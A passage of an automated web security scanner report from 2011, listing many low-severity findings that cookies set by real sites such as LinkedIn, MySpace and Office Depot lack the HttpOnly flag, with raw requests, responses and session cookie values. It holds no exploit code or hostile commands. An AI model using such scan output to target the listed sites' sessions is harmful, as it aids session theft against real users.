GET /content/press_release/ebay_selects_joomla_open_source_to_foste HTTP/1.1
Host: www.ebayinc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.132. http://www.experthost.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.experthost.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=ug8lo0eso5l1caor5e6snp0n32; path=/
SN47e3b11e7ddd7=ug8lo0eso5l1caor5e6snp0n32; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.experthost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:13:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=ug8lo0eso5l1caor5e6snp0n32; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, must-revalidate
Pragma: no-cache
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Set-Cookie: SN47e3b11e7ddd7=ug8lo0eso5l1caor5e6snp0n32; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

14.133. http://www.forrent.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.forrent.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=8ct7fdk873duftnhmjoh7oems5; path=/, test_element_id=0; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.forrent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.134. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.heroturko.org
Path:	/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=2636237a3d9a6cc753ecc8b5ac337b9c; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.135. http://www.homes.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homes.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=60949328;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
CFTOKEN=33627566;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
IS_MOBILE=false;domain=homes.com;expires=Tue, 25-Jan-2011 23:46:20 GMT;path=/
IS_MOBILE=false;path=/
CFGLOBALS=urltoken%3DCFID%23%3D60949328%26CFTOKEN%23%3D33627566%23lastvisit%3D%7Bts%20%272011%2D01%2D24%2018%3A46%3A20%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D24%2018%3A46%3A20%27%7D%23hitcount%3D2%23cftoken%3D33627566%23cfid%3D60949328%23;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
TS4d7797=e908a900d531093072d6317c62f2667deb209ca39e7db0094d3e16c81399c6ee753c24c91beeb5004578232ed38192d33f299dc0d38192d33f299dc057e19d31bf3d0887; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.homes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.136. http://www.hotelcoupons.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.hotelcoupons.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSSSQSDQC=DNBEMMLCBPOAIFFKBFHHMBOM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.hotelcoupons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.137. http://www.iloubnan.info/artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.iloubnan.info
Path:	/artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=f7486e8717b0e20364b742ecc154ea9e; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22 HTTP/1.1
Host: www.iloubnan.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:45:43 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=f7486e8717b0e20364b742ecc154ea9e; path=/
Connection: close
Content-Type: text/html
Content-Length: 46875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"

xmlns:og="http://opengraph
...[SNIP]...

14.138. https://www.isc.org/software/inn previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.isc.org
Path:	/software/inn

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS9cfe3c2aaf50d7f05c32ca05c0087e5f=6n6is5r71p8hmcq9aea7k12pe1; path=/; domain=.isc.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /software/inn HTTP/1.1
Host: www.isc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.139. http://www.linkedin.com/company/805465 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.linkedin.com
Path:	/company/805465

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID="ajax:4114291373918205941"; Version=1; Path=/
leo_auth_token="GST:UoW4AS-tuKNn5DcHUPtJAkw5UTo1RwdYXEpCAnyOqUgnfH_r88e9Gn:1295930580:095f9f787f0c0472ca72a7237529789a55194807"; Version=1; Max-Age=1799; Expires=Tue, 25-Jan-2011 05:12:59 GMT; Path=/
s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
bcookie="v=1&6c07c4c1-6690-4d02-b09e-6b0aecb2966c"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Sun, 12-Feb-2079 07:57:07 GMT; Path=/
lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/805465 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.140. http://www.liutilities.com/affcb/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.liutilities.com
Path:	/affcb/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQCAQDBDA=NJMAJEECHGPFEFOADGEGCEPG; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /affcb/ HTTP/1.1
Host: www.liutilities.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Mon, 24 Jan 2011 16:01:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://store.uniblue.com/278/purl-?affiliate=&x-at=
Content-Length: 176
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCAQDBDA=NJMAJEECHGPFEFOADGEGCEPG; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://store.uniblue.com/278/purl-?affiliate=&x-at=">here</a>.</body>

14.141. http://www.mathias-bank.de/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mathias-bank.de
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=3497fb0606bae927d83d82e254f5c56a; path=/
bb2_screener_=1295930659+173.193.214.243; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.mathias-bank.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Pingback: http://www.mathias-bank.de/xmlrpc.php
Set-Cookie: bb2_screener_=1295930659+173.193.214.243; path=/
Set-Cookie: PHPSESSID=3497fb0606bae927d83d82e254f5c56a; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...

14.142. http://www.metacafe.com/fplayer/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.metacafe.com
Path:	/fplayer/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=37405ae87945ce0d058ea5e18b5a73df; path=/; domain=.metacafe.com
OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
OAID=f488ed4f4e9ec6a273b4b088e853dd33; expires=Wed, 25-Jan-2012 04:45:05 GMT; path=/; domain=.metacafe.com
User=%7B%22sc%22%3A1%2C%22visitID%22%3A%225ff37793909b485fc44ca3c3af4425f7%22%2C%22LEID%22%3A15%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22pve%22%3A1%7D; expires=Sun, 24-Jan-2016 04:45:05 GMT; path=/; domain=.metacafe.com
dsavip=3400536236.20480.0000; expires=Tue, 25-Jan-2011 05:45:05 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.143. http://www.mister-wong.com/index.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mister-wong.com
Path:	/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wongsess=847df68c6b6a1522859025303610eb1c; expires=Fri, 25 Jan 2036 10:46:31 GMT; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.144. http://www.myproductadvisor.com/mpa/autobytel/setCookie.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.myproductadvisor.com
Path:	/mpa/autobytel/setCookie.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=a7ff3102cc2a90029701232ccef5; Path=/mpa
Coyote-2-c0a8010b=c0a801cd:0; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mpa/autobytel/setCookie.do HTTP/1.1
Host: www.myproductadvisor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 00:08:23 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: UIVERSION_COOKIE=1; Path=/mpa/
Set-Cookie: JSESSIONID=a7ff3102cc2a90029701232ccef5; Path=/mpa
Location: http://www.myproductadvisor.com/mpa/cookiecheck.do?originalurl=aHR0cDovL3d3dy5teXByb2R1Y3RhZHZpc29yLmNvbS9tcGEvYXV0b2J5dGVsL3NldENvb2tpZS5kbw==
Content-Length: 0
P3P: policyref="/content/w3c/p3p.xml", CP="NOI DSP NID CURa ADMa DEVa TAIa PSAa PSDa OUR NOR IND COM NAV STA"
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-c0a8010b=c0a801cd:0; path=/

14.145. http://www.myspace.com/Modules/PostTo/Pages/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.myspace.com
Path:	/Modules/PostTo/Pages/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SessionDDF2=2xXsSLB0L/Krw+qh8vhTHCxfMhyIHxzrYDO28EaiUBPQMUu1i3A6r1xa3arh/mC2nMPd7rwv4zTXGXj6+HLj9g==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:55 GMT; path=/
MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988150464779&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:55 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.146. http://www.myspace.com/netlingo previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.myspace.com
Path:	/netlingo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SessionDDF2=IHTN/IBoYERycvsTA4ECVPeqWgVgcluvK1Z4IiOTaL2hfgaqs8vsgeImvs/aMpMVsmPVoHOAflPeo6+ygc0HVA==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:52 GMT; path=/
MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988124700820&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:52 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /netlingo HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.147. http://www.net-folio.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.net-folio.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=dd1e473e424e2ab82663e797b0d63d68; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.net-folio.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 04:47:23 GMT
Server: Apache
Set-Cookie: PHPSESSID=dd1e473e424e2ab82663e797b0d63d68; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /website-for-photographers/index.php
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

14.148. http://www.netlingo.com/log-out.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/log-out.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=ehd1dtnn6gfpn9q5gde0agedi1; path=/
username=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
email=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
password=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
userid=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
paiduserYN=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /log-out.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 04:52:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=ehd1dtnn6gfpn9q5gde0agedi1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: username=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
Set-Cookie: email=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
Set-Cookie: password=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
Set-Cookie: userid=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
Set-Cookie: paiduserYN=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
location: login.php?frm_error=2
Content-Length: 0
Connection: close
Content-Type: text/html

14.149. http://www.netlingo.com/login.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=p2kggg0b9m3bnq9c57hhsvlcl0; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.150. http://www.netlingo.com/register.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/register.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=sb796kqmjk5b811eau65ljq195; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /register.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.151. http://www.netlingo.com/shop/index.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/shop/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=ubh5bqn9kj4a5lcoor3k51ph52; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shop/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=ubh5bqn9kj4a5lcoor3k51ph52; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

14.152. http://www.netlingo.com/shop/shopping-cart.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/shop/shopping-cart.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=ogucvrimkkhjf3ddi951jdps62; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shop/shopping-cart.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=ogucvrimkkhjf3ddi951jdps62; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 32824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

14.153. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.networkworld.com
Path:	/community/blog/ebay-use-joomla-open-source-glue

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SESSa27dc0841fd4d8567c009be96a283c67=cl3ko5pm3b3hr81s3vr2lv1nc2; expires=Thu, 17-Feb-2011 08:37:13 GMT; path=/; domain=.networkworld.com
Apache=173.193.214.243.1295931833340495; path=/; expires=Thu, 24-Jan-13 05:03:53 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.154. http://www.newsguy.com/charity_chart.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.newsguy.com
Path:	/charity_chart.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=07012ad8141231b123a48e02dfed57fc; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /charity_chart.htm HTTP/1.1
Host: www.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 15:15:23 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=07012ad8141231b123a48e02dfed57fc; path=/
Location: /
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 0

14.155. http://www.newsguy.com/home_popupstatus.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.newsguy.com
Path:	/home_popupstatus.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=035b0223f0f25a4fbdfd2af72cd3349f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home_popupstatus.htm HTTP/1.1
Host: www.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 15:15:23 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=035b0223f0f25a4fbdfd2af72cd3349f; path=/
Location: /
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 0

14.156. http://www.newsguy.com/overview.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.newsguy.com
Path:	/overview.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=0b3bde5ef4c5042fc11d526d2dd84342; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /overview.htm HTTP/1.1
Host: www.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:24 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0b3bde5ef4c5042fc11d526d2dd84342; path=/
Content-Length: 33263
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Newsguy's Account Options</title>
<meta NAME="descript
...[SNIP]...

14.157. http://www.officedepot.com/promo.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.officedepot.com
Path:	/promo.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic; Path=/
jsession_unique_id=1295931847463; Expires=Tue, 25 Jan 2011 06:34:07 GMT; Path=/
IBSD_LOCALE=en_US; Expires=Fri, 20 Jan 2012 05:04:07 GMT; Path=/
CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
cae_browser=desktop; path=/; domain=.officedepot.com

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /promo.do HTTP/1.1
Host: www.officedepot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.158. http://www.opensource.org/licenses/bsd-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/bsd-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=orttk62qs56op2so5ctlcpa9u7; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/bsd-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.159. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=4iogpts99t9ivnkufvcubm4sb4; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
